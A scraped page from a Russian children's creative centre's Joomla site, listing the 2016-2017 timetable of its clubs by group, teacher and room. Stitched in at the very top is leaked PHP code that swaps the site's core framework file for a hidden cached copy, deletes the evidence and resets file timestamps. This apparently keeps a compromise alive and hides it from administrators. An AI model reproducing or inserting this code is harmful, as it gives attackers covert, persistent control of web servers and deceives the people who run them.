$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Расписание занятий
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы иметь возможность оставлять комментарии и скачивать фотографии из нашей "ФОТОГАЛЕРЕИ".



Спасибо за регистрацию.

План мероприятий

Сентябрь 2017
Пн Вт Ср Чт Пт Сб Вс
28 29 30 31 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 1
Developed by JoomVision.com
Баннер

Расписание занятий PDF Печать E-mail
Автор: Administrator   
31.08.2016 12:09

 «Утверждаю»

Директор ДДТ

 ________________А.И. Девятаев

 

 

Расписание занятий творческих объединений

МАУДО «Дом детского творчествап.Новосергиевка»

2016-2017 учебный год

 

 

Название, ФИО руководителя

Понедельник

    Вторник

      Среда

     Четверг

    Пятница

    Суббота

«ЮИД»

Даутов З.Г.

НСОШ №1

Гр. 3.1

15.00-15.45

15.55-16.40

 

Гр. 1.1

15.00-15.45

15.55-16.40

Гр. 2.1

17.40-18.25

18.35-19.20

Гр. 3.1

15.00-15.45

15.55-16.40

 

Гр. 1.1

15.00-15.45

15.55-16.40

Гр. 2.1

17.40-18.25

18.35-19.20

 

 

«Дымок»

Сысина А.Н.

Кабинет №14

 

Гр.1.1

14.00-14.45

14.55-15.40

Гр. 2.1

15.50-16.35

16.45-17.30

 

 

Гр.1.1

14.00-14.45

14.55-15.40

Гр. 2.1

15.50-16.35

16.45-17.30

 

 

 

«Авиамоделизм»

Медведев Н.Н.  

Кабинет №15

Гр. 2.1

14.00-14.45

14.55-15.40

Гр. 2.2

15.50-16.35

16.45-17.30

Гр.3.1

17.40-18.25

18.35-19.20

Гр. 1.1

14.00-14.45

14.55-15.40

Гр.3.2

15.50-16.35

16.45-17.30

 

 

 

 

Гр. 2.1

14.00-14.45

14.55-15.40

Гр. 2.2

15.50-16.35

16.45-17.30

Гр.3.1

17.40-18.25

18.35-19.20

 

Гр. 1.1

14.00-14.45

14.55-15.40

Гр.3.2

15.50-16.35

16.45-17.30

 

 

 

 

Гр. 2.1

14.00-14.45

14.55-15.40

Гр. 2.2

15.50-16.35

16.45-17.30

Гр.3.1

17.40-18.25

18.35-19.20

Гр.3.2

15.50-16.35

16.45-17.30

 

Танцевальный ансамбль

«Арабеск»

Алимова Т.С.

Актовый зал ДДТ

Гр. 3.1

14.00-14.45

14.55-15.40

Гр. 3.2

16.00-16.45

16.55-17.40

Гр.1.1

14.00-14.45

14.55-15.40

Гр. 2.1

15.50-16.35

16.45-17.30

Гр. 2.2

17.40-18.25

18.35-19.20

Гр. 3.1

14.00-14.45

14.55-15.40

Гр. 3.2

16.00-16.45

16.55-17.40

Гр.1.1

14.00-14.45

14.55-15.40

Гр. 2.1

15.50-16.35

16.45-17.30

Гр. 2.2

17.40-18.25

18.35-19.20

Гр. 3.1

14.00-14.45

14.55-15.40

Гр. 3.2

16.00-16.45

16.55-17.40

 

Телестудия «Мы вместе»

Девятаева О.А.

Кабинет №12

Гр.2.1

14.00-14.45

14.55-15.40

Гр. 2.2

15.50-16.35

16.45-17.30

Гр.3.1

17.40-18.25

18.35-19.20

Гр.1.1

14.00-14.45

14.55-15.40

Гр. 3.3

15.50-16.35

16.45-17.30

Гр. 3.2

17.40-18.25

18.35-19.20

 

Гр.2.1

14.00-14.45

14.55-15.40

Гр. 2.2

15.50-16.35

16.45-17.30

Гр.3.1

17.40-18.25

18.35-19.20

Гр.1.1

14.00-14.45

14.55-15.40

Гр. 3.3

15.50-16.35

16.45-17.30

Гр. 3.2

17.40-18.25

18.35-19.20

 

Гр.2.1

14.00-14.45

14.55-15.40

Гр. 2.2

15.50-16.35

16.45-17.30

Гр.3.1

17.40-18.25

18.35-19.20

Гр. 3.3

15.50-16.35

16.45-17.30

Гр. 3.2

17.40-18.25

18.35-19.20

 

«Канитель»

Давыдова Е.М.

Кабинет №11

 

Гр. 1.1

11.45-12.30

12.40-13.25

Гр.2.1

13.55-14.40

14.50-15.35

15.45-16.30

Гр.2.2

09.00-09.45

09.55-10.40

10.50-11.35

Индивид.

16.40-17.25
 

Гр. 1.1

11.45-12.30

12.40-13.25

Гр.2.1

13.55-14.40

14.50-15.35

15.45-16.30

Гр.2.2

09.00-09.45

09.55-10.40

10.50-11.35

Индивид.

16.40-17.25

 

 

«Керамика»

Мигачева Н.В.

Кабинет №14

Гр.1.1

13.00-13.45

13.55-14.40

Гр.2.1

10.05-10.50

11.00-11-45

11.55-12.40

Гр.1.1

13.00-13.45

13.55-14.40

Гр.2.1

10.05-10.50

11.00-11-45

11.55-12.40

 

 

Студия эстрадного пения

«Музыка плюс»

Соловых И. В.

Кабинет №7

 

Гр.1.1

16.10-16.55

17.05-17.50

Гр.4.1

18.00-18.45

18.55-19.40

Гр.4.2

17.10-17.55

18.05-18.50

Гр.1.1

16.10-16.55

17.05-17.50

Гр.4.1

18.00-18.45

18.55-19.40

Гр.4.2

17.10-17.55

18.05-18.50

 

«Компьютерра»

Каминский В.З.

Кабинет №5

Гр.3.1

14.00-14.45

14.55-15.40

Гр. 3.2

15.50-16.35

16.45-17.30

Гр.3.3

17.40-18.25

18.35-19.20

Гр. 1.1

15.00-15.45

15.55-16.40

Гр.2.1

11.00-11.45

11.55-12.40

 

Гр.3.1

14.00-14.45

14.55-15.40

Гр. 3.2

15.50-16.35

16.45-17.30

Гр.3.3

17.40-18.25

18.35-19.20

Гр. 1.1

15.00-15.45

15.55-16.40

Гр.2.1

11.00-11.45

11.55-12.40


 

Гр.3.1

14.00-14.45

14.55-15.40

Гр. 3.2

15.50-16.35

16.45-17.30

Гр.3.3

17.40-18.25

18.35-19.20

 

«Русичи»

Кулебякин О.Е.

НСОШ №3

 

Гр.1.1

15.50-16.35

16.45-17.30

Гр. 2.1

17.40-18.25

18.35-19.20

 

Гр.1.1

15.50-16.35

16.45-17.30

Гр. 2.1

17.40-18.25

18.35-19.20

 

 

«Юный пограничник»

Мигачёв А.М.

НСОШ №2

 

Гр.1.1

15.50-16.35

16.45-17.30

Гр. 1.2

17.40-18.25

18.35-19.20

 

Гр.1.1

15.50-16.35

16.45-17.30

Гр. 1.2

17.40-18.25

18.35-19.20

 

 

«Мой край»

Окшин П.Е.

Рыбкинская СОШ

Гр. 3.1

15.00-15.45

15.55-16.40

Гр. 3.2

16.50-17.35

17.45-18.30

Гр. 2.1

15.00-15.45

15.55-16.40

Гр. 3.1

15.00-15.45

15.55-16.40

Гр. 3.2

16.50-17.35

17.45-18.30

Гр. 2.1

15.00-15.45

15.55-16.40

Гр. 3.1

15.00-15.45

15.55-16.40

Гр. 3.2

16.50-17.35

17.45-18.30

 

«Юный турист»

Ручкин М.В

Кулагинская СОШ

Гр. 3.1

15.00-15.45

15.55-16.40

Гр. 3.2

16.50-17.35

17.45-18.30

Гр. 2.1

15.00-15.45

15.55-16.40

Гр. 3.1

15.00-15.45

15.55-16.40

Гр. 3.2

16.50-17.35

17.45-18.30

Гр. 2.1

15.00-15.45

15.55-16.40

Гр. 3.1

15.00-15.45

15.55-16.40

Гр. 3.2

16.50-17.35

17.45-18.30

 

«Азимут»

Семенов А.Н.

Землянская ООШ

Гр. 2.2

16.00-16.45

16.55-17.40

Гр. 1.1

15.00-15.45

15.55-16.40

Гр. 2.1

17.40-18.25

18.35-19.20

Гр. 2.2

16.00-16.45

16.55-17.40

Гр. 1.1

15.00-15.45

15.55-16.40

Гр. 2.1

17.40-18.25

18.35-19.20

 

 

«Туристические тропы»

Бражкин Д.В.

Герасимовская СОШ

Гр. 2.2

16.00-16.45

16.55-17.40

Гр. 1.1

15.00-15.45

15.55-16.40

Гр. 2.1

17.40-18.25

18.35-19.20

Гр. 2.2

16.00-16.45

16.55-17.40

Гр. 1.1

15.00-15.45

15.55-16.40

Гр. 2.1

17.40-18.25

18.35-19.20

 

 

«Туристы 21 века»

Смолина Н.В.

Платовская СОШ им.А.Матросова

Гр. 1.1.

14.35-15.20

15.30-16.15

Гр. 4.1.

16.25-17.10

17.20-18.05

Гр. 5.1.

18.15-19.00

19.10-19.55

Гр. 2.1.

14.35-15.20

15.30-16.15

Гр. 3.1.

16.25-17.10

17.20-18.05

 

Гр. 5.1.

17.25-18.10

18.20-19.05

Гр. 2.1.

14.35-15.20

15.30-16.15

Гр. 3.1.

16.25-17.10

17.20-18.05

Гр. 1.1

14.35-15.20

15.30-16.15

Гр. 3.1.

16.25-17.10

17.20-18.05

Гр. 4.1.

18.15-19.00

19.10-19.55

Гр. 2.1.

14.35-15.20

15.30-16.15

Гр. 4.1.

16.25-17.10

17.20-18.05

Гр. 5.1.

18.15-19.00

19.10-19.55

«Крепкий карабин»

Жангуров М.С.

Краснополянская ООШ

Гр. 2.1

15.00-15.45

15.55-16.40

 

Гр. 1.1

15.00-15.45

15.55-16.40

Гр. 1.2

16.50-17.35

17.45-18.30

Гр. 2.1

15.00-15.45

15.55-16.40

 

Гр. 1.1

15.00-15.45

15.55-16.40

Гр.1.2

16.50-17.35

17.45-18.30

 

 

«В движении»

Балашова В.В.

Актовый зал ДДТ

 

Гр.1.1

9.00-9.30

9.40-10.10

Гр.1.2

16.00-16.30

16.40-17.10

Гр.1.3

18.30-19.15

19.25-20.10

Гр.1.5

10.15-11.00

11.10-11.55

Гр.1.4

18.30-19.15

19.25-20.10

Гр.2.1

15.30-16.15

16.25-17.10

17.20-18.05

Гр.1.1

9.00-9.30

9.40-10.10

Гр.1.2

16.00-16.30

16.40-17.10

Гр.1.3

18.30-19.15

19.25-20.10

Гр.1.5

10.15-11.00

11.10-11.55

Гр.1.4

18.30-19.15

19.25-20.10

Гр.2.1

15.30-16.15

16.25-17.10

17.20-18.05

 

 

Назад

Обновлено 15.11.2016 16:57